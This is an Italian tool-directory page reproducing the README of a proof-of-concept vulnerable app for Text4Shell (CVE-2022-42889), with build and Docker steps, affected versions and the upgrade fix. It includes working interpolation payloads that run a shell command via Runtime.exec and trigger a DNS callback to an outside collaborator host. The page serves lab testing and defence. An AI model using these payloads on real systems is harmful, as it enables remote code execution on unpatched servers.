Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
text4shell-poc — Applicazione Proof of Concept per testare CVE-2022-42889 | Kitploit
Strumenti/GitHubGitHub/securekomodo/text4shell-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubsecurekomodo/text4shell-poc

text4shell-poc

Applicazione Proof of Concept per testare CVE-2022-42889

Vedi Repository
8113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Applicazione di Test PoC per CVE-2022-42889

Questa è un'applicazione vulnerabile sviluppata come Proof of Concept per la vulnerabilità CVE-2022-42889.

Installazione Maven

Per eseguire questo avrai bisogno di:

  • JDK 17 o superiore
  • Maven
  1. Clona il repository git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Installazione Maven per creare il JAR
root@kitploit:~
mvn clean install

Questo creerà la cartella ./target e all'interno di essa dovrebbe esserci il file JAR text4shell-poc-0.0.1-SNAPSHOT.jar

  1. Avvia il server web
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

Questo avvierà un server web sul tuo localhost in ascolto sulla porta 8080 di default

  1. Naviga al server web

Accedi al server web all'indirizzo http://localhost:8080/ e dovresti vedere il seguente output

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. Esegui l'exploit manualmente o effettua una scansione usando text4shell-scan

Payload di esempio per exploit

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

Encoder URL consigliato per una dimostrazione di exploit di successo: https://www.urlencoder.org/.

Docker

In alternativa puoi usare Docker per eseguire questo PoC:

  1. Clona il repository git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Build Docker
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Docker run
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. Testa l'applicazione vulnerabile
root@kitploit:~
http://localhost/
  1. L'attacco può essere eseguito passando una stringa “${prefix:name}” come mostrato di seguito:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

Encoder URL consigliato per una dimostrazione di exploit di successo: https://www.urlencoder.org/.

In alternativa puoi validare l'efficacia di strumenti di scansione come text4shell-scan

Sei Vulnerabile?

Affinché il tuo codice sia vulnerabile devi:

  • Eseguire una versione di Apache commons-text dalla versione 1.5.0 fino alla (esclusa) 1.10.0
  • Utilizzare l'Interpolazione per la tua StringSubstitution (vedi https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) - nota che non è molto comune

La Soluzione

La soluzione è aggiornare le tue istanze di commons-text alla versione 1.10.0 o successiva.

Autore

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
Scarica lo strumento